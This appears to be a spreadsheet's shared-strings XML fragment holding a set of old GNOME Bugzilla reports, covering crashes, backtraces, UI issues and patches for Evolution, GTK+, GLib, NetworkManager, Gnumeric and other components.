  <si>
    <t>pawsa</t>
  </si>
  <si>
    <t>LIBGNOMECANVAS-72424</t>
  </si>
  <si>
    <t>items</t>
  </si>
  <si>
    <t>LIBGNOMECANVAS</t>
  </si>
  <si>
    <t>canvas line without points but arrows in aa mode</t>
  </si>
  <si>
    <t>AA Canvas crashes if you create a line that has arrows enabled but not
yet any point positions set.
I've attached a patch that fixes this problem.</t>
  </si>
  <si>
    <t>libgnomecanvas-maint</t>
  </si>
  <si>
    <t>Andreas.Holzmann</t>
  </si>
  <si>
    <t>NAUTILUS-139488</t>
  </si>
  <si>
    <t>Navigation</t>
  </si>
  <si>
    <t>Close window in spatial mode when launching external application with middle button</t>
  </si>
  <si>
    <t>I think it whould be consistent behavior in nautilus when clicking on middle
button on say ps document. Then as with folders nautilus should launch ggv and
close window with direcrory. So should behave shift+left click.</t>
  </si>
  <si>
    <t>GTK+-329144</t>
  </si>
  <si>
    <t>critical in gtk_widget_event</t>
  </si>
  <si>
    <t>Epiphany suddenly crashed.</t>
  </si>
  <si>
    <t>GNOME-PANEL-140185</t>
  </si>
  <si>
    <t>Gnome Panel unhides itself when ctrl is pressed</t>
  </si>
  <si>
    <t>Open keyboard accessibility features dialog -&gt; mouse keys -&gt; mouse preferences 
dialog -&gt; cursors -&gt; enable locate ptr enable.
Enable keyboard accessibility features .
Now hide the gnome-panel using any of the hide buttons(arrow).
If ctrl is pressed the gnome-panel unhides itself and also the mouse pointer 
position is pinpointed.</t>
  </si>
  <si>
    <t>rajulkadam</t>
  </si>
  <si>
    <t>EVOLUTION-254773</t>
  </si>
  <si>
    <t>Cannot import using Evolution 1.5.3 from Fedora Core 2 Test 1</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Selecting File-&gt;Import (Ctrl+I) in Evolution 1.5.3 from Rawhide/Fedora
Core Development Tree - nothing happens!
Steps to reproduce the problem:
1. Select File Import
2. 
3. 
Actual Results:
Nothing.
Expected Results:
Import dialog box.
How often does this happen? 
Every time.
Additional Information:
The setup screens also mention importing of mail however there is no
import configuration screen presented.</t>
  </si>
  <si>
    <t>alphastar</t>
  </si>
  <si>
    <t>GNOME-CORE-52696</t>
  </si>
  <si>
    <t>panel crashes</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  panel
Severity: normal
Version:  1.2.4
Synopsis: panel crashes
Class:    sw-bug
Distribution: Red Hat Linux release 7.0 (Guinness)
System: Linux 2.2.16-22 i686 unknown
C library: glibc-2.1.92-14
C compiler: 2.96
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.6
gnome-libs: gnome-libs 1.2.11
libxml: 1.8.10
gnome-print: gnome-print-0.25-8_helix_1
gnome-core: gnome-core 1.2.4
Description:
its crashing my panel
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
0x405f85a9 in __wait4 () from /lib/libc.so.6
#0  0x405f85a9 in __wait4 () from /lib/libc.so.6
#1  0x40662824 in __DTOR_END__ () from /lib/libc.so.6
#2  0x4015b23a in gnome_segv_handle (signum=11) at gnome-init.c:660
#3  
#4  0x4002be6d in GNOME_Applet_set_tooltips_state ()
   from /usr/lib/libpanel_applet.so.0
#5  0x807918d in load_queued_externs ()
#6  0x4002d603 in _ORBIT_skel_GNOME_PanelSpot_register_us ()
   from /usr/lib/libpanel_applet.so.0
#7  0x4005e364 in ORBit_POA_handle_request (recv_buffer=0x80e5568 
    poa=0x80e49a0) at orbit_poa.c:507
#8  0x4006056e in ORBit_handle_incoming_request (recv_buffer=0x80e5568)
    at server.c:89
#9  0x40060795 in ORBit_handle_incoming_message (recv_buffer=0x80e5568)
    at server.c:159
#10 0x40077420 in giop_main_handle_connection (connection=0x8199ba8)
    at connection.c:1211
#11 0x400ea41d in orb_handle_connection (source=0x8199c48 cond=G_IO_IN 
    cnx=0x8199ba8) at orbitgtk.c:44
#12 0x400921a0 in g_io_unix_dispatch () from /usr/lib/libglib-1.2.so.0
#13 0x40093987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#14 0x40094001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#15 0x400941cc in g_main_run () from /usr/lib/libglib-1.2.so.0
#16 0x402a3f87 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#17 0x8056082 in main ()
#18 0x4055eb65 in __libc_start_main (main=0x8055d70  argc=3 
    ubp_av=0xbffffa04 init=0x8053370  fini=0x8093b5c  
    rtld_fini=0x4000df24  stack_end=0xbffff9fc)
    at ../sysdeps/generic/libc-start.c:111
#0  0x405f85a9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40662824 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4015b23a in gnome_segv_handle (signum=11) at gnome-init.c:660
in_segv.5 = 1
pid = 0
estatus = 135839056
buf = \020\000\000\000Ã \ff@ÃŒL\t@\220Â½\030\b\230Ã¿3@Ã˜ÃµÃ¿Â¿nÃ£[@PÂ½\030\b
#3  
No locals.
#4  0x4002be6d in GNOME_Applet_set_tooltips_state ()
   from /usr/lib/libpanel_applet.so.0
No symbol table info available.
#5  0x807918d in load_queued_externs ()
No symbol table info available.
#6  0x4002d603 in _ORBIT_skel_GNOME_PanelSpot_register_us ()
   from /usr/lib/libpanel_applet.so.0
No symbol table info available.
#7  0x4005e364 in ORBit_POA_handle_request (recv_buffer=0x80e5568 
    poa=0x80e49a0) at orbit_poa.c:507
servant = (PortableServer_ServantBase *) 0x818bc18
cookie = 0xbffff778
obj_impl = (ORBit_POAObject *) 0x818bc70
tmp_obj_impl = {object_id = 0x40660ce0 servant = 0x40660ce0 
  poa = 0xbffff7a8 orb = 0x80e49a0 objnum = 135157096 
  rand_data = Â¨\233\031\bÂ¨Ã·Ã¿Â¿}
skel = 0
imp = 0x8079080
ev = {_major = CORBA_NO_EXCEPTION _repo_id = 0x0 _params = 0x0 _any = 0x0}
send_buffer = (GIOPSendBuffer *) 0xbffff760
opname = (guchar *) 0x818bc18 
oid = (PortableServer_ObjectId *) 0x818bca0
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-03-30 17:43 -------
The original reporter (giliak012@hotmail.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>giliak012</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE-445201</t>
  </si>
  <si>
    <t>subscribe to other user's calendar gives me generic error</t>
  </si>
  <si>
    <t>Please describe the problem:
When I click on the menu File subscribe to other user's calendar I can pick a user from the global address list and when I press ok I always get generic error.
Other users with Outlook can open the shared calendars no problem.  If I use Outlook with my credentials then I can also open the shared calendars in question.
My own calendar on the same Exchange server works fine.
Steps to reproduce:
1. click File subscribe to other user's calendar
2. specify a valid user
3. click ok
Actual results:
Evolution reports generic error with an OK button. (It's not ok with me)
Expected results:
Open the specified user's calendar for viewing
Does this happen every time?
yes
Other information:
Tried running on Mandriva 2007.0 and 2007.1 KDE desktop
Here is the output from E2K_DEBUG=5 evolution &gt;&amp; evo2.log
CalDAV Eplugin starting up ...
** (evolution:12906): DEBUG: mailto URL command: evolution %s
** (evolution:12906): DEBUG: mailto URL program: evolution
(evolution:12906): e-data-server-DEBUG: Loading categories from /home/scott/.evolution/categories.xml
(evolution:12906): e-data-server-DEBUG: Loaded 29 categories
(evolution:12906): libecal-WARNING **: e-cal.c:318: Unexpected response
(evolution:12906): Gtk-CRITICAL **: gtk_widget_get_direction: assertion `GTK_IS_WIDGET (widget)' failed
(evolution:12906): Gtk-CRITICAL **: gtk_widget_get_direction: assertion `GTK_IS_WIDGET (widget)' failed
(evolution:12906): Gtk-CRITICAL **: gtk_widget_get_direction: assertion `GTK_IS_WIDGET (widget)' failed
(evolution:12906): Gtk-CRITICAL **: gtk_widget_get_direction: assertion `GTK_IS_WIDGET (widget)' failed
(evolution:12906): Gtk-CRITICAL **: gtk_widget_get_direction: assertion `GTK_IS_WIDGET (widget)' failed
(evolution:12906): Gtk-CRITICAL **: gtk_widget_get_direction: assertion `GTK_IS_WIDGET (widget)' failed
(evolution:12906): Gtk-CRITICAL **: gtk_widget_get_direction: assertion `GTK_IS_WIDGET (widget)' failed</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE-232504</t>
  </si>
  <si>
    <t>Crash: Ximian Connector: putting a forward slash in the domain/username</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.0.8
Synopsis: Ximian Connector: putting a forward slash in the domain/username 
Bugzilla-Product: Evolution
Bugzilla-Component: Connector
Description:
trying to connect to the Microsoft Exchange server in my organization i
experimented with putting a forward slash / between my Domain Name and
my User Name and i get this error on password check and/or when the
program initializes
Debugging Information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...[New Thread 1024 (LWP 4677)]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0x40eb0ea9 in wait4 () from /lib/libc.so.6
#0  0x40eb0ea9 in wait4 () from /lib/libc.so.6
#1  0x40f21b64 in __DTOR_END__ () from /lib/libc.so.6
#2  0x40209dac in waitpid () from /lib/libpthread.so.0
#3  0x409cdb6e in gnome_init () from /usr/lib/libgnomeui.so.32
#4  0x4020b835 in __pthread_sighandler () from /lib/libpthread.so.0
#5  
#6  0x0806a2e2 in mail_stub_listener_stop_listening ()
#7  0x08068f03 in exchange_storage_connect ()
#8  0x080670ca in GNOME_Evolution_WombatClient_forgetPassword ()
#9  0x40d92f40 in g_timeout_add () from /usr/lib/libglib-1.2.so.0
#10 0x40d91fa5 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#11 0x40d925a9 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#12 0x40d92738 in g_main_run () from /usr/lib/libglib-1.2.so.0
#13 0x40b0b1ef in gtk_main () from /usr/lib/libgtk-1.2.so.0
#14 0x402c635f in bonobo_main () from /usr/lib/libbonobo.so.2
#15 0x0806a08c in main ()
#16 0x40e3424a in __libc_start_main () from /lib/libc.so.6
Thread 1 (Thread 1024 (LWP 4677)):
#0  0x40eb0ea9 in wait4 () from /lib/libc.so.6
#1  0x40f21b64 in __DTOR_END__ () from /lib/libc.so.6
#2  0x40209dac in waitpid () from /lib/libpthread.so.0
#3  0x409cdb6e in gnome_init () from /usr/lib/libgnomeui.so.32
#4  0x4020b835 in __pthread_sighandler () from /lib/libpthread.so.0
#5  
#6  0x0806a2e2 in mail_stub_listener_stop_listening ()
#7  0x08068f03 in exchange_storage_connect ()
#8  0x080670ca in GNOME_Evolution_WombatClient_forgetPassword ()
#9  0x40d92f40 in g_timeout_add () from /usr/lib/libglib-1.2.so.0
#10 0x40d91fa5 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#11 0x40d925a9 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#12 0x40d92738 in g_main_run () from /usr/lib/libglib-1.2.so.0
#13 0x40b0b1ef in gtk_main () from /usr/lib/libgtk-1.2.so.0
#14 0x402c635f in bonobo_main () from /usr/lib/libbonobo.so.2
#15 0x0806a08c in main ()
#16 0x40e3424a in __libc_start_main () from /lib/libc.so.6
#0  0x40eb0ea9 in wait4 () from /lib/libc.so.6
#0  0x40eb0ea9 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x40f21b64 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40209dac in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x409cdb6e in gnome_init () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#4  0x4020b835 in __pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#5  
No symbol table info available.
#6  0x0806a2e2 in mail_stub_listener_stop_listening ()
No symbol table info available.
#7  0x08068f03 in exchange_storage_connect ()
No symbol table info available.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>mprov</t>
  </si>
  <si>
    <t>EVOLUTION-223679</t>
  </si>
  <si>
    <t>Add default key server in ~/.gnupg/options to User doc</t>
  </si>
  <si>
    <t>Thanks for making the Evolution Users Guide a great doc.  I do have a
suggestion though.
DOC:      A User's Guide to Ximian Evolution
Chapter:  3. Using Evolution for Email
Section:  Getting and Using Public Keys
I would add a quick note on how the user can set up gpg to automatically
query a key server when the key is not in the keychain.  Simply add the line:
keyserver wwwkeys.pgp.net
to ~/.gnupgp/options
This makes evolution/pgp very nice as you do not have to open a cmd prompt
and add a key every time you want to verify a sig or unencrypt a message.</t>
  </si>
  <si>
    <t>meekrob</t>
  </si>
  <si>
    <t>EPIPHANY-361538</t>
  </si>
  <si>
    <t>I18N</t>
  </si>
  <si>
    <t>Add si (Sinhala) to the list of locales requiring Pango</t>
  </si>
  <si>
    <t>Please describe the problem:
Need to add si (Sinhala) to the list of locales requiring Pango for rendering. Sinhala is a South Asian script similar to Indic scripts.
Steps to reproduce:
1. Visit:
http://cvs.savannah.nongnu.org/viewcvs/*checkout*/sinhala/patches/icu-sinhala-rendering.txt?root=sinhala
Actual results:
Displays 'formatting' characters instead of Sinhala characters.
Expected results:
Display Sinhala characters.
Does this happen every time?
Yes
Other information:
Here's a Sinhala font for testing:
http://sinhala.sourceforge.net/files/lklug.ttf</t>
  </si>
  <si>
    <t>GNOME-CORE-36382</t>
  </si>
  <si>
    <t>deskguide</t>
  </si>
  <si>
    <t>Deskguide displays incorrectly after restarting sawfish</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-core
Version: 1.2.4-0_helix_2
When Sawfish is restarted while multiple workspaces exist the deskguide applett incorrectly displays all workspaces in one square (instead of creating new squares for each one as it usually does).
I'm restarting Sawfish using 'sawfish-client -c restart'.  Sawfish version is 0.30.3-10 from Red Hat 7.
Eric Fikus
------- Additional Comments From eric@fikus.staticky.com 2001-01-01 21:32:37 ----
Subject: Deskguide display problem (fixed)
From: Eric Fikus 
To: 36382@bugs.gnome.org
Message-Id: 
Date: Mon 1 Jan 2001 19:32:37 -0700
I updated my version of Sawfish and it seems to work fine now.
Eric Fikus
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 15:11 -------
This bug was previously known as bug 36382 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=36382
Originally filed under the gnome-core product and general component.
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (eric@fikus.staticky.com) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-core-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>ORCA-486971</t>
  </si>
  <si>
    <t>[verified]Where Am I doesn't present toggle button state</t>
  </si>
  <si>
    <t>Steps to reproduce:
1) Run the Expander demo.  The Details thing is a toggle button
2) Do a basic Where Am I via KP_Enter. 
3) Orca should present the toggle button state (e.g. pressed or not pressed).</t>
  </si>
  <si>
    <t>GLIB-78209</t>
  </si>
  <si>
    <t>GIOChannels emit warnings when data remains for broken TCP connections</t>
  </si>
  <si>
    <t>If you have a TCP connection handled by a GIOChannel with unflushed data
left and the other end of the connection goes down you get a number of
warnings from glib about invalid file descriptors when the GIOChannel is
finalized:
 (process:17077): GLib-WARNING **: giounix.c:396:g_io_unix_get_flags()Error
while getting flags for FD: Bad file descriptor (9)
 (process:17077): GLib-WARNING **: Invalid file descriptor.
 (process:17077): GLib-WARNING **: Invalid file descriptor.
 (process:17077): GLib-WARNING **: Error flushing string: Bad file descriptor
There doesn't seem to be any way around this except by clearing the write
buffer before the GIOChannel is finalized with:
  g_string_truncate(channel-&gt;write_buf 0)
Works great only problem is that the GIOChannel struct is marked private.
I'm attaching three files. The first is a program that listens on port
12122. Connect to that port and break the connection. I have used netcat
for testing:
 nc localhost 12122
The second file is a backtrace after running this program with
G_DEBUG=fatal_warnings.
The third file is a patch that fixes the problem _for me_.</t>
  </si>
  <si>
    <t>gnome-bugzilla-EW16</t>
  </si>
  <si>
    <t>BEAGLE-159848</t>
  </si>
  <si>
    <t>New Blam Errors</t>
  </si>
  <si>
    <t>Fredrik said he shoudl be able to fix this last night but just wanted to put
the bug in as a reminder
Seeing this:
INFO: Could not open Blam! channel list: System.Xml.XmlException: Document
element did not appear.
in [0x00110] (at /home/cvs/mcs/class/System.XML/System.Xml/XmlTextReader.cs:552)
System.Xml.XmlTextReader:Read ()
in [0x0002c] (at /home/cvs/mcs/class/System.XML/System.Xml/XmlReader.cs:406)
System.Xml.XmlReader:MoveToContent ()
in [0x00006] (at
/home/cvs/mcs/class/System.XML/System.Xml.Serialization/XmlSerializationReaderInterpreter.cs:83)
System.Xml.Serialization.XmlSerializationReaderInterpreter:ReadRoot ()
in [0x00022] (at
/home/cvs/mcs/class/System.XML/System.Xml.Serialization/XmlSerializer.cs:324)
System.Xml.Serialization.XmlSerializer:Deserialize
(System.Xml.Serialization.XmlSerializationReader)
in [0x0002e] (at
/home/cvs/mcs/class/System.XML/System.Xml.Serialization/XmlSerializer.cs:313)
System.Xml.Serialization.XmlSerializer:Deserialize (System.Xml.XmlReader)
in  Beagle.Daemon.BlamQueryable.ChannelCollection:LoadFromFile
(string)in  Beagle.Daemon.BlamQueryable.BlamQueryable:Index ()
INFO: Could not open Blam! channel list: System.Xml.XmlException: Expected =
but found  [-1] Line 3932 position 66.
in [0x0005d] (at
/home/cvs/mcs/class/System.XML/System.Xml/XmlTextReader.cs:2717)
System.Xml.XmlTextReader:ExpectAfterWhitespace (char)
in [0x00078] (at
/home/cvs/mcs/class/System.XML/System.Xml/XmlTextReader.cs:1860)
System.Xml.XmlTextReader:ReadAttributes (bool)
in [0x00089] (at
/home/cvs/mcs/class/System.XML/System.Xml/XmlTextReader.cs:1482)
System.Xml.XmlTextReader:ReadStartTag ()
in [0x00129] (at
/home/cvs/mcs/class/System.XML/System.Xml/XmlTextReader.cs:1410)
System.Xml.XmlTextReader:ReadContent ()
in [0x000e0] (at /home/cvs/mcs/class/System.XML/System.Xml/XmlTextReader.cs:549)
System.Xml.XmlTextReader:Read ()
in [0x0002c] (at /home/cvs/mcs/class/System.XML/System.Xml/XmlReader.cs:406)
System.Xml.XmlReader:MoveToContent ()
in [0x00a6a] (at
/home/cvs/mcs/class/System.XML/System.Xml.Serialization/XmlSerializationReaderInterpreter.cs:445)
System.Xml.Serialization.XmlSerializationReaderInterpreter:ReadMembers
(System.Xml.Serialization.ClassMapobjectboolbool)
in [0x0000f] (at
/home/cvs/mcs/class/System.XML/System.Xml.Serialization/XmlSerializationReaderInterpreter.cs:223)
System.Xml.Serialization.XmlSerializationReaderInterpreter:ReadClassInstanceMembers
(System.Xml.Serialization.XmlTypeMappingobject)
in [0x000d1] (at
/home/cvs/mcs/class/System.XML/System.Xml.Serialization/XmlSerializationReaderInterpreter.cs:214)
System.Xml.Serialization.XmlSerializationReaderInterpreter:ReadClassInstance
(System.Xml.Serialization.XmlTypeMappingboolbool)
in [0x00035] (at
/home/cvs/mcs/class/System.XML/System.Xml.Serialization/XmlSerializationReaderInterpreter.cs:176)
System.Xml.Serialization.XmlSerializationReaderInterpreter:ReadObject
(System.Xml.Serialization.XmlTypeMappingboolbool)
in [0x0006a] (at
/home/cvs/mcs/class/System.XML/System.Xml.Serialization/XmlSerializationReaderInterpreter.cs:533)
System.Xml.Serialization.XmlSerializationReaderInterpreter:ReadObjectElement
(System.Xml.Serialization.XmlTypeMapElementInfo)in [0x00666] (at
/home/cvs/mcs/class/System.XML/System.Xml.Serialization/XmlSerializationReaderInterpreter.cs:380)
System.Xml.Serialization.XmlSerializationReaderInterpreter:ReadMembers
(System.Xml.Serialization.ClassMapobjectboolbool)
in [0x0000f] (at
/home/cvs/mcs/class/System.XML/System.Xml.Serialization/XmlSerializationReaderInterpreter.cs:223)
System.Xml.Serialization.XmlSerializationReaderInterpreter:ReadClassInstanceMembers
(System.Xml.Serialization.XmlTypeMappingobject)
in [0x000d1] (at
/home/cvs/mcs/class/System.XML/System.Xml.Serialization/XmlSerializationReaderInterpreter.cs:214)
System.Xml.Serialization.XmlSerializationReaderInterpreter:ReadClassInstance
(System.Xml.Serialization.XmlTypeMappingboolbool)
in [0x00035] (at
/home/cvs/mcs/class/System.XML/System.Xml.Serialization/XmlSerializationReaderInterpreter.cs:176)
System.Xml.Serialization.XmlSerializationReaderInterpreter:ReadObject
(System.Xml.Serialization.XmlTypeMappingboolbool)
in [0x0005b] (at
/home/cvs/mcs/class/System.XML/System.Xml.Serialization/XmlSerializationReaderInterpreter.cs:168)
System.Xml.Serialization.XmlSerializationReaderInterpreter:ReadRoot
(System.Xml.Serialization.XmlTypeMapping)
in [0x00034] (at
/home/cvs/mcs/class/System.XML/System.Xml.Serialization/XmlSerializationReaderInterpreter.cs:88)
System.Xml.Serialization.XmlSerializationReaderInterpreter:ReadRoot ()
in [0x00022] (at
/home/cvs/mcs/class/System.XML/System.Xml.Serialization/XmlSerializer.cs:324)
System.Xml.Serialization.XmlSerializer:Deserialize
(System.Xml.Serialization.XmlSerializationReader)
in [0x0002e] (at
/home/cvs/mcs/class/System.XML/System.Xml.Serialization/XmlSerializer.cs:313)
System.Xml.Serialization.XmlSerializer:Deserialize (System.Xml.XmlReader)
in  Beagle.Daemon.BlamQueryable.ChannelCollection:LoadFromFile
(string)in  Beagle.Daemon.BlamQueryable.BlamQueryable:Index ()</t>
  </si>
  <si>
    <t>FILE-ROLLER-90534</t>
  </si>
  <si>
    <t>Symlinks aren't listed as that type</t>
  </si>
  <si>
    <t>The arhive list view says unknown file type for symlinks. Shouldn't it
say symlink or link?</t>
  </si>
  <si>
    <t>hakon_</t>
  </si>
  <si>
    <t>GTK+-388123</t>
  </si>
  <si>
    <t>_gtk_file_chooser_embed_set_delegate() docs typo.</t>
  </si>
  <si>
    <t>2006-12-21  Murray Cumming  
        * gtk/gtkfilechooserembed.c: _gtk_file_chooser_embed_set_delegate(): 
        Minor correction to the documentation correcting a typo and mentioning 
        _gtk_file_chooser_embed_delegate_iface_init() instead of 
        _gtk_file_chooser_delegate_iface_init().
OK to apply?</t>
  </si>
  <si>
    <t>PAN-105879</t>
  </si>
  <si>
    <t>msg-id gets trimmed in dialogbox</t>
  </si>
  <si>
    <t>Seems like one characters is being put in the bit bucket for power
saving when showing the msgid in a dialogbox in pan rpm 0.3.3.92. See
 for a
screenshot of the bug.</t>
  </si>
  <si>
    <t>NETWORKMANAGER-491047</t>
  </si>
  <si>
    <t>network-manager finds no network devices and uses 100% CPU</t>
  </si>
  <si>
    <t>Using NM 0.6.5-0ubuntu16 on ubuntu gutsy on powerpc.
NM finds no devices in previous versions (feisty) it should see the airport (orinoco) and the built in ethernet.
the following message is but in syslog
Oct 27 19:07:05 titania NetworkManager:  starting...
Oct 27 19:07:05 titania NetworkManager:  new_nl_handle(): new_nl_handle: couldn't connecto to netlink: bind() failed (errno = Operation not permitted)
Oct 27 19:07:05 titania NetworkManager:  eth1: Device is fully-supported using driver 'macio'.
Oct 27 19:07:05 titania NetworkManager:  nm_device_init(): waiting for device's worker thread to start
Oct 27 19:07:05 titania NetworkManager:  nm_device_init(): device's worker thread started continuing.
Oct 27 19:07:05 titania NetworkManager:  Now managing wireless (802.11) device 'eth1'.
Oct 27 19:07:05 titania NetworkManager:  Deactivating device eth1.
Oct 27 19:07:05 titania avahi-daemon[10402]: Withdrawing address record for fe80::230:65ff:fe2c:74d7 on eth1.
Oct 27 19:07:05 titania kernel: [ 3193.972402] eth1: New link status: Disconnected (0002)
Oct 27 19:07:05 titania NetworkManager:  new_nl_handle(): new_nl_handle: couldn't connecto to netlink: bind() failed (errno = Operation not permitted)
Oct 27 19:07:05 titania NetworkManager:  eth0: Device is fully-supported using driver 'gem'.
Oct 27 19:07:05 titania NetworkManager:  nm_device_init(): waiting for device's worker thread to start
Oct 27 19:07:05 titania NetworkManager:  nm_device_init(): device's worker thread started continuing.
Oct 27 19:07:05 titania NetworkManager:  Now managing wired Ethernet (802.3) device 'eth0'.
Oct 27 19:07:05 titania NetworkManager:  Deactivating device eth0.
Oct 27 19:07:05 titania avahi-daemon[10402]: Withdrawing address record for 192.168.1.146 on eth0.
Oct 27 19:07:05 titania avahi-daemon[10402]: Leaving mDNS multicast group on interface eth0.IPv4 with address 192.168.1.146.
Oct 27 19:07:05 titania avahi-daemon[10402]: Interface eth0.IPv4 no longer relevant for mDNS.
Oct 27 19:07:05 titania NetworkManager:  new_nl_handle(): new_nl_handle: couldn't connecto to netlink: bind() failed (errno = Operation not permitted)
Oct 27 19:07:05 titania NetworkManager:  nm_signal_handler(): Caught signal 11. Generating backtrace...
Oct 27 19:07:05 titania NetworkManager: ******************* START **********************************
Oct 27 19:07:05 titania NetworkManager:  Will activate wired connection 'eth0' because it now has a link.
Oct 27 19:07:05 titania kernel: [ 3194.152985] eth1: New link status: Connected (0001)
Oct 27 19:07:05 titania kernel: [ 3194.154912] ADDRCONF(NETDEV_CHANGE): eth1: link becomes ready
Oct 27 19:07:05 titania NetworkManager: Using host libthread_db library /lib/libthread_db.so.1.
Oct 27 19:07:05 titania NetworkManager: [Thread debugging using libthread_db enabled]
Oct 27 19:07:05 titania NetworkManager: [New Thread 805502976 (LWP 11455)]
Oct 27 19:07:05 titania NetworkManager: [New Thread 822281424 (LWP 11459)]
Oct 27 19:07:05 titania NetworkManager: [New Thread 813892816 (LWP 11456)]
Oct 27 19:07:05 titania NetworkManager: 0x0fbff994 in ?? () from /lib/libpthread.so.0
Oct 27 19:07:05 titania NetworkManager: ******************* END **********************************</t>
  </si>
  <si>
    <t>samtygier</t>
  </si>
  <si>
    <t>GFTP-117709</t>
  </si>
  <si>
    <t>Transfers fail to complete with large files</t>
  </si>
  <si>
    <t>When large files are transfered the transfers get into a endless loop
when the files are large.  The failing sizes are greater than 150MB.
Around 600MB files always fail.  The files appear to have completely
tranfered but gftp fails to recognize it and gftp tries to transfer
more of the file. So the remote server tells GFTP that is a bad offset
because the offset sent to the remote server is greater than the file
size.</t>
  </si>
  <si>
    <t>Durbin_Ron</t>
  </si>
  <si>
    <t>GNOME-CUPS-MANAGER-338227</t>
  </si>
  <si>
    <t>gnome-cups-manager</t>
  </si>
  <si>
    <t>GNOME-CUPS-MANAGER</t>
  </si>
  <si>
    <t>IPP warnings</t>
  </si>
  <si>
    <t>After opening the Print dialog once epiphany keeps on printing these error messages every few seconds.
** (epiphany:25114): WARNING **: IPP request failed with status 1280
I should note that I don't have a printer installed.</t>
  </si>
  <si>
    <t>GNOME-CALCULATOR-158357</t>
  </si>
  <si>
    <t>Does not build because of deprecation of gnome-i18n.h</t>
  </si>
  <si>
    <t>_ and N_ are undefined in several files</t>
  </si>
  <si>
    <t>GNUMERIC-57320</t>
  </si>
  <si>
    <t>Analytics</t>
  </si>
  <si>
    <t>Confidence level estimate in descriptive statistics are false</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Gnumeric
Severity: major
Version: 0.64
Synopsis: [Gnumeric] confidence level estimate in descriptive statistics of Gnumeric are false
Bugzilla-Product: Gnumeric
Bugzilla-Component: Analytics
Description:
In Data menu of Gnumeric exist Data Analysis entrance. When pick in a window show up. In this window you can pick in Descriptive Statistics. In a new window you can select what do you want that the program calculate and many variables that includes the confidence level for Mean. By defect appear 0.95. 
By other way you can use de function confidence in statistics menu and you must include the confidence level that you want. In help you can read This function is Excel compatible.
Well I used the descriptive statistics function and I localized an error. I got imposible data when used this function and then used the confidence level function with the same results. How confidence function is excel compatible I use an Excel program for this calculus and reading the help of the function I discover that the variable that I had put was not confidence level was alfa where the confidence level is 1-alfa.
Then I used alfa in confidence function and in descriptive statistics and all results was correct.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-07-10 06:05 -------
The original reporter (rromeral@mantis.it.uc3m.es) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component jgoldberg@home.com.
</t>
  </si>
  <si>
    <t>rromeral</t>
  </si>
  <si>
    <t>GDM-103260</t>
  </si>
  <si>
    <t>Session script setup that works with multiple *dm and supports a switchdesk-type feature etc.</t>
  </si>
  <si>
    <t xml:space="preserve">Bugzilla-Product: gdm
Description:
  Please see https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=81624
  for the original bug report.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-01-12 21:12 -------
Reassigning to the default owner of the component jirka@5z.com.
</t>
  </si>
  <si>
    <t>GTK+-346713</t>
  </si>
  <si>
    <t>Backend: Quartz</t>
  </si>
  <si>
    <t>[PATCH] quartz backend is missing functions that pygtk needs</t>
  </si>
  <si>
    <t>Please describe the problem:
Newer versions of pygtk require a number of functions which the quartz backend of GTK+ doesn't define. When one attempts to run a pygtk script the dynamic linker gets mad because of undefined symbols and refuses to run.
The attached patch adds stubs for the missing functions. Alternatively we could have pygtk not use the missing functions--I have written a Ruby script which can make this automatic (http://vasi.dyndns.org:3128/trac/browser/gtk-osx/trunk/scripts/pygtk-missing.rb) I'll elaborate if anybody's interested.
Steps to reproduce:
1. Build pygtk against a GTK which uses the quartz backend.
2. Attempt to run any pygtk script eg: pygtk-demo.
Actual results:
Dyld barfs:
ImportError: dlopen(/gtkosx/lib/python2.3/site-packages/gtk-2.0/gtk/_gtk.so 2): Symbol not found: _gtk_clipboard_wait_for_rich_text
  Referenced from: /gtkosx/lib/python2.3/site-packages/gtk-2.0/gtk/_gtk.so
  Expected in: flat namespace
Expected results:
The script should run.
Does this happen every time?
Yes.
Other information:</t>
  </si>
  <si>
    <t>gtk-quartz-maint</t>
  </si>
  <si>
    <t>djvasi</t>
  </si>
  <si>
    <t>CHEESE-508910</t>
  </si>
  <si>
